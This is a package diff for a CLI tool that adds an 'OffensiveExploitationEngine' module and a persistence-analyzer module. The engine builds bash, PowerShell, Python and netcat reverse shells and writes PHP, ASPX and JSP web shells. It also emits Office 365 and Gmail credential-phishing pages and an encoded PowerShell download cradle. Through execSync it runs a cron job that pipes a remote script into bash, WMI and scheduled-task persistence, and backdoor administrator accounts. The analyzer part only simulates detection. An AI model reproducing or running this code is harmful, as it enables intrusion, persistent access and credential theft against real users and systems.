erosolar-cli 1.5.2 → 1.5.4

package/dist/security/offensive/exploitationEngine.js

@@ -0,0 +1,263 @@
+/**
+ * Offensive Exploitation Engine
+ *
+ * Advanced exploitation capabilities for security testing.
+ */
+import { execSync } from 'child_process';
+import { writeFileSync } from 'fs';
+import { platform } from 'os';
+/**
+ * Offensive Exploitation Engine
+ */
+export class OffensiveExploitationEngine {
+    /**
+     * Generate reverse shell payloads
+     */
+    generateReverseShell(target, port) {
+        const payloads = [];
+        // Bash reverse shell
+        payloads.push({
+            type: 'bash-reverse-shell',
+            platform: 'linux',
+            content: `bash -i >& /dev/tcp/${target}/${port} 0>&1`
+        });
+        // PowerShell reverse shell
+        payloads.push({
+            type: 'powershell-reverse-shell',
+            platform: 'windows',
+            content: `$client = New-Object System.Net.Sockets.TCPClient('${target}',${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`
+        });
+        // Python reverse shell
+        payloads.push({
+            type: 'python-reverse-shell',
+            platform: 'cross-platform',
+            content: `import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${target}',${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);`
+        });
+        // Netcat reverse shell
+        payloads.push({
+            type: 'netcat-reverse-shell',
+            platform: 'linux',
+            content: `nc -e /bin/sh ${target} ${port}`
+        });
+        return payloads;
+    }
+    /**
+     * Create fileless persistence
+     */
+    async createFilelessPersistence() {
+        try {
+            const currentPlatform = platform();
+            if (currentPlatform === 'win32') {
+                // Windows WMI event subscription
+                const wmiScript = `$FilterArgs = @{Name='TestFilter'; EventNameSpace='root\\cimv2'; QueryLanguage='WQL'; Query='SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name=\"explorer.exe\"'}; $Filter=Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $FilterArgs; $ConsumerArgs = @{Name='TestConsumer'; CommandLineTemplate='cmd.exe /c echo persistence > C:\\temp\\test.txt'}; $Consumer=Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs; $BindingArgs = @{Filter=$Filter; Consumer=$Consumer}; $Binding=Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs`;
+                execSync(`powershell -Command "${wmiScript}"`, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: 'WMI event subscription created for fileless persistence',
+                    evidence: 'WMI event filter and consumer created',
+                    technique: 'wmi-event-subscription'
+                };
+            }
+            else {
+                // Linux memory execution via cron
+                const cronEntry = `* * * * * curl -s http://example.com/malicious.sh | bash -s`;
+                execSync(`(crontab -l 2>/dev/null; echo "${cronEntry}") | crontab -`, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: 'Fileless persistence via cron created',
+                    evidence: 'Cron job added for memory execution',
+                    technique: 'cron-memory-execution'
+                };
+            }
+        }
+        catch (error) {
+            return {
+                success: false,
+                output: `Fileless persistence failed: ${error}`,
+                evidence: '',
+                technique: 'fileless-persistence'
+            };
+        }
+    }
+    /**
+     * Deploy web shell
+     */
+    async deployWebShell(targetPath, password = 'pass123') {
+        try {
+            // PHP web shell
+            const phpWebShell = `<?php if(isset($_POST['${password}'])){system($_POST['${password}']);}?>`;
+            // ASP web shell
+            const aspWebShell = `<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %><script runat="server">void Page_Load(object sender, EventArgs e){if(Request.Form["${password}"] != null){Process.Start("cmd.exe", "/c " + Request.Form["${password}"]);}}</script>`;
+            // JSP web shell
+            const jspWebShell = `<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("${password}") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("${password}")); } %>`;
+            // Write web shell
+            writeFileSync(`${targetPath}/shell.php`, phpWebShell);
+            writeFileSync(`${targetPath}/shell.aspx`, aspWebShell);
+            writeFileSync(`${targetPath}/shell.jsp`, jspWebShell);
+            return {
+                success: true,
+                output: 'Multiple web shells deployed',
+                evidence: `Web shells created at ${targetPath}`,
+                technique: 'web-shell-deployment'
+            };
+        }
+        catch (error) {
+            return {
+                success: false,
+                output: `Web shell deployment failed: ${error}`,
+                evidence: '',
+                technique: 'web-shell-deployment'
+            };
+        }
+    }
+    /**
+     * Create persistence via scheduled tasks
+     */
+    async createScheduledPersistence() {
+        try {
+            const currentPlatform = platform();
+            if (currentPlatform === 'win32') {
+                // Windows scheduled task
+                const taskCommand = `schtasks /create /tn "SystemUpdate" /tr "cmd.exe /c echo persistence > C:\\temp\\persistence.txt" /sc minute /mo 1`;
+                execSync(taskCommand, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: 'Scheduled task created for persistence',
+                    evidence: 'SystemUpdate task created',
+                    technique: 'scheduled-task-persistence'
+                };
+            }
+            else {
+                // Linux at job
+                const atCommand = `echo 'echo "persistence" > /tmp/persistence.txt' | at now + 1 minute`;
+                execSync(atCommand, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: 'At job created for persistence',
+                    evidence: 'At job scheduled',
+                    technique: 'at-job-persistence'
+                };
+            }
+        }
+        catch (error) {
+            return {
+                success: false,
+                output: `Scheduled persistence failed: ${error}`,
+                evidence: '',
+                technique: 'scheduled-persistence'
+            };
+        }
+    }
+    /**
+     * Generate obfuscated payloads
+     */
+    generateObfuscatedPayloads() {
+        const payloads = [];
+        // Base64 encoded PowerShell
+        const base64PowerShell = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=';
+        payloads.push({
+            type: 'base64-powershell',
+            platform: 'windows',
+            content: `powershell -EncodedCommand ${base64PowerShell}`
+        });
+        // XOR encoded shellcode
+        const xorShellcode = '\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a';
+        payloads.push({
+            type: 'xor-shellcode',
+            platform: 'linux',
+            content: `echo -ne '${xorShellcode}' > /tmp/shellcode.bin`
+        });
+        // JavaScript obfuscation
+        const obfuscatedJS = `eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))`;
+        payloads.push({
+            type: 'obfuscated-js',
+            platform: 'cross-platform',
+            content: obfuscatedJS
+        });
+        return payloads;
+    }
+    /**
+     * Create DNS tunneling setup
+     */
+    async setupDnsTunneling(domain) {
+        try {
+            // Create DNS tunneling configuration
+            const dnsConfig = `server=8.8.8.8\naddress=/${domain}/127.0.0.1`;
+            writeFileSync('/tmp/dnsmasq.conf', dnsConfig);
+            return {
+                success: true,
+                output: 'DNS tunneling configuration created',
+                evidence: `DNS config for domain ${domain}`,
+                technique: 'dns-tunneling'
+            };
+        }
+        catch (error) {
+            return {
+                success: false,
+                output: `DNS tunneling setup failed: ${error}`,
+                evidence: '',
+                technique: 'dns-tunneling'
+            };
+        }
+    }
+    /**
+     * Generate phishing templates
+     */
+    generatePhishingTemplates() {
+        const templates = [];
+        // Office 365 phishing
+        const office365Template = `<!DOCTYPE html><html><body><form action="http://malicious.com/collect" method="post"><input type="email" name="username" placeholder="Email"><input type="password" name="password" placeholder="Password"><button>Sign In</button></form></body></html>`;
+        templates.push({
+            type: 'office365-phishing',
+            platform: 'web',
+            content: office365Template
+        });
+        // Gmail phishing
+        const gmailTemplate = `<!DOCTYPE html><html><body style="font-family: Arial;"><div style="max-width: 400px; margin: 50px auto; padding: 20px; border: 1px solid #ddd;"><img src="https://www.gstatic.com/images/branding/product/1x/gsa_512dp.png" width="50" style="display: block; margin: 0 auto;"><h2 style="text-align: center;">Sign in</h2><form action="http://malicious.com/gmail" method="post"><input type="email" name="email" placeholder="Email or phone" style="width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd;"><input type="password" name="password" placeholder="Enter your password" style="width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd;"><button style="width: 100%; padding: 10px; background: #1a73e8; color: white; border: none;">Next</button></form></div></body></html>`;
+        templates.push({
+            type: 'gmail-phishing',
+            platform: 'web',
+            content: gmailTemplate
+        });
+        return templates;
+    }
+    /**
+     * Create backdoor user account
+     */
+    async createBackdoorUser(username, password) {
+        try {
+            const currentPlatform = platform();
+            if (currentPlatform === 'win32') {
+                // Windows user creation
+                const userCommand = `net user ${username} ${password} /add && net localgroup administrators ${username} /add`;
+                execSync(userCommand, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: `Backdoor user ${username} created with admin privileges`,
+                    evidence: `User account ${username} added to administrators`,
+                    technique: 'backdoor-user-creation'
+                };
+            }
+            else {
+                // Linux user creation
+                const userCommand = `useradd -m -s /bin/bash ${username} && echo '${username}:${password}' | chpasswd && usermod -aG sudo ${username}`;
+                execSync(userCommand, { stdio: 'pipe' });
+                return {
+                    success: true,
+                    output: `Backdoor user ${username} created with sudo privileges`,
+                    evidence: `User ${username} added to sudo group`,
+                    technique: 'backdoor-user-creation'
+                };
+            }
+        }
+        catch (error) {
+            return {
+                success: false,
+                output: `Backdoor user creation failed: ${error}`,
+                evidence: '',
+                technique: 'backdoor-user-creation'
+            };
+        }
+    }
+}
+//# sourceMappingURL=exploitationEngine.js.map

package/dist/security/offensive/exploitationEngine.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"exploitationEngine.js","sourceRoot":"","sources":["../../../src/security/offensive/exploitationEngine.ts"],"names":[],"mappings":"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"}

package/dist/security/persistence-analyzer.d.ts

@@ -0,0 +1,56 @@
+/**
+ * Persistence Analyzer CLI Tool
+ *
+ * Command-line interface for analyzing persistence mechanisms
+ * across different operating systems.
+ */
+import { DetectedTechnique } from './persistence-research.js';
+interface AnalysisOptions {
+    platform: string;
+    outputFormat: 'text' | 'json' | 'csv';
+    includeRemediation: boolean;
+    riskThreshold: 'low' | 'medium' | 'high' | 'critical';
+}
+export declare class PersistenceAnalyzer {
+    private toolkit;
+    constructor();
+    /**
+     * Analyze persistence techniques for a specific platform
+     */
+    analyzePlatform(options: AnalysisOptions): string;
+    /**
+     * Generate detection rules for specific techniques
+     */
+    generateDetectionRules(techniqueIds: string[]): string;
+    /**
+     * Generate test cases for security validation
+     */
+    generateTestCases(platform: string): string;
+    /**
+     * Filter techniques by risk level
+     */
+    private filterByRiskLevel;
+    /**
+     * Format analysis as plain text
+     */
+    private formatAsText;
+    /**
+     * Format analysis as JSON
+     */
+    private formatAsJSON;
+    /**
+     * Format analysis as CSV
+     */
+    private formatAsCSV;
+    /**
+     * Simulate detection of persistence techniques
+     * (For demonstration purposes in a research environment)
+     */
+    simulateDetection(platform: string): DetectedTechnique[];
+    /**
+     * Generate security assessment report
+     */
+    generateAssessmentReport(platform: string): string;
+}
+export {};
+//# sourceMappingURL=persistence-analyzer.d.ts.map

package/dist/security/persistence-analyzer.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"persistence-analyzer.d.ts","sourceRoot":"","sources":["../../src/security/persistence-analyzer.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH,OAAO,EAAoD,iBAAiB,EAAE,MAAM,2BAA2B,CAAC;AAEhH,UAAU,eAAe;IACvB,QAAQ,EAAE,MAAM,CAAC;IACjB,YAAY,EAAE,MAAM,GAAG,MAAM,GAAG,KAAK,CAAC;IACtC,kBAAkB,EAAE,OAAO,CAAC;IAC5B,aAAa,EAAE,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;CACvD;AAED,qBAAa,mBAAmB;IAC9B,OAAO,CAAC,OAAO,CAA6B;;IAM5C;;OAEG;IACH,eAAe,CAAC,OAAO,EAAE,eAAe,GAAG,MAAM;IAcjD;;OAEG;IACH,sBAAsB,CAAC,YAAY,EAAE,MAAM,EAAE,GAAG,MAAM;IAatD;;OAEG;IACH,iBAAiB,CAAC,QAAQ,EAAE,MAAM,GAAG,MAAM;IAK3C;;OAEG;IACH,OAAO,CAAC,iBAAiB;IAazB;;OAEG;IACH,OAAO,CAAC,YAAY;IAmCpB;;OAEG;IACH,OAAO,CAAC,YAAY;IAsBpB;;OAEG;IACH,OAAO,CAAC,WAAW;IA4BnB;;;OAGG;IACH,iBAAiB,CAAC,QAAQ,EAAE,MAAM,GAAG,iBAAiB,EAAE;IAmBxD;;OAEG;IACH,wBAAwB,CAAC,QAAQ,EAAE,MAAM,GAAG,MAAM;CAqCnD"}

package/dist/security/persistence-analyzer.js

@@ -0,0 +1,187 @@
+/**
+ * Persistence Analyzer CLI Tool
+ *
+ * Command-line interface for analyzing persistence mechanisms
+ * across different operating systems.
+ */
+import { PersistenceResearchToolkit } from './persistence-research.js';
+export class PersistenceAnalyzer {
+    toolkit;
+    constructor() {
+        this.toolkit = new PersistenceResearchToolkit();
+    }
+    /**
+     * Analyze persistence techniques for a specific platform
+     */
+    analyzePlatform(options) {
+        const techniques = this.toolkit.getTechniquesByPlatform(options.platform);
+        const filteredTechniques = this.filterByRiskLevel(techniques, options.riskThreshold);
+        switch (options.outputFormat) {
+            case 'json':
+                return this.formatAsJSON(filteredTechniques, options);
+            case 'csv':
+                return this.formatAsCSV(filteredTechniques, options);
+            default:
+                return this.formatAsText(filteredTechniques, options);
+        }
+    }
+    /**
+     * Generate detection rules for specific techniques
+     */
+    generateDetectionRules(techniqueIds) {
+        const rules = [];
+        techniqueIds.forEach(id => {
+            const techniqueRules = this.toolkit.generateDetectionRules(id);
+            rules.push(`Detection Rules for ${id}:`);
+            rules.push(...techniqueRules);
+            rules.push('');
+        });
+        return rules.join('\n');
+    }
+    /**
+     * Generate test cases for security validation
+     */
+    generateTestCases(platform) {
+        const testCases = this.toolkit.generateTestCases(platform);
+        return testCases.join('\n');
+    }
+    /**
+     * Filter techniques by risk level
+     */
+    filterByRiskLevel(techniques, threshold) {
+        const riskLevels = ['low', 'medium', 'high', 'critical'];
+        const thresholdIndex = riskLevels.indexOf(threshold);
+        return techniques.filter(tech => {
+            const techIndex = riskLevels.indexOf(tech.riskLevel);
+            return techIndex >= thresholdIndex;
+        });
+    }
+    /**
+     * Format analysis as plain text
+     */
+    formatAsText(techniques, options) {
+        const output = [];
+        output.push(`Persistence Analysis for ${options.platform.toUpperCase()}`);
+        output.push('='.repeat(50));
+        output.push(`Total Techniques: ${techniques.length}`);
+        output.push(`Risk Threshold: ${options.riskThreshold}`);
+        output.push('');
+        techniques.forEach(tech => {
+            output.push(`Technique: ${tech.name}`);
+            output.push(`MITRE ID: ${tech.mitreId || 'N/A'}`);
+            output.push(`Risk Level: ${tech.riskLevel}`);
+            output.push(`Description: ${tech.description}`);
+            output.push('Detection Methods:');
+            tech.detectionMethods.forEach(method => {
+                output.push(`  • ${method}`);
+            });
+            if (options.includeRemediation) {
+                output.push('Remediation Steps:');
+                tech.remediationSteps.forEach(step => {
+                    output.push(`  • ${step}`);
+                });
+            }
+            output.push('');
+        });
+        return output.join('\n');
+    }
+    /**
+     * Format analysis as JSON
+     */
+    formatAsJSON(techniques, options) {
+        const analysis = {
+            platform: options.platform,
+            riskThreshold: options.riskThreshold,
+            totalTechniques: techniques.length,
+            techniques: techniques.map(tech => ({
+                id: tech.id,
+                name: tech.name,
+                mitreId: tech.mitreId,
+                riskLevel: tech.riskLevel,
+                description: tech.description,
+                detectionMethods: tech.detectionMethods,
+                remediationSteps: options.includeRemediation ? tech.remediationSteps : undefined
+            }))
+        };
+        return JSON.stringify(analysis, null, 2);
+    }
+    /**
+     * Format analysis as CSV
+     */
+    formatAsCSV(techniques, options) {
+        const headers = ['ID', 'Name', 'MITRE ID', 'Risk Level', 'Description'];
+        if (options.includeRemediation) {
+            headers.push('Remediation Steps');
+        }
+        const rows = techniques.map(tech => {
+            const row = [
+                tech.id,
+                tech.name,
+                tech.mitreId || '',
+                tech.riskLevel,
+                `"${tech.description}"`
+            ];
+            if (options.includeRemediation) {
+                row.push(`"${tech.remediationSteps.join('; ')}"`);
+            }
+            return row.join(',');
+        });
+        return [headers.join(','), ...rows].join('\n');
+    }
+    /**
+     * Simulate detection of persistence techniques
+     * (For demonstration purposes in a research environment)
+     */
+    simulateDetection(platform) {
+        const techniques = this.toolkit.getTechniquesByPlatform(platform);
+        const detected = [];
+        // Simulate random detection for demonstration
+        techniques.forEach(tech => {
+            if (Math.random() > 0.7) { // 30% chance of "detection"
+                detected.push({
+                    technique: tech,
+                    evidence: `Simulated detection in ${platform} environment`,
+                    confidence: ['low', 'medium', 'high'][Math.floor(Math.random() * 3)],
+                    location: `/simulated/path/${tech.id}`
+                });
+            }
+        });
+        return detected;
+    }
+    /**
+     * Generate security assessment report
+     */
+    generateAssessmentReport(platform) {
+        const detected = this.simulateDetection(platform);
+        const totalTechniques = this.toolkit.getTechniquesByPlatform(platform).length;
+        const report = [];
+        report.push(`Security Assessment Report - ${platform.toUpperCase()}`);
+        report.push('='.repeat(60));
+        report.push(`Total Persistence Techniques: ${totalTechniques}`);
+        report.push(`Detected Techniques: ${detected.length}`);
+        report.push(`Detection Rate: ${((detected.length / totalTechniques) * 100).toFixed(1)}%`);
+        report.push('');
+        if (detected.length > 0) {
+            report.push('DETECTED PERSISTENCE TECHNIQUES:');
+            report.push('-'.repeat(40));
+            detected.forEach(detectedTech => {
+                report.push(`Technique: ${detectedTech.technique.name}`);
+                report.push(`  MITRE ID: ${detectedTech.technique.mitreId || 'N/A'}`);
+                report.push(`  Confidence: ${detectedTech.confidence}`);
+                report.push(`  Location: ${detectedTech.location}`);
+                report.push(`  Evidence: ${detectedTech.evidence}`);
+                report.push('');
+            });
+            report.push('REMEDIATION GUIDANCE:');
+            report.push('-'.repeat(40));
+            const remediation = this.toolkit.getRemediationGuidance(detected);
+            report.push(...remediation);
+        }
+        else {
+            report.push('No persistence techniques detected in this simulation.');
+            report.push('Consider running additional detection methods for comprehensive assessment.');
+        }
+        return report.join('\n');
+    }
+}
+//# sourceMappingURL=persistence-analyzer.js.map

package/dist/security/persistence-analyzer.js.map

@@ -0,0 +1 @@
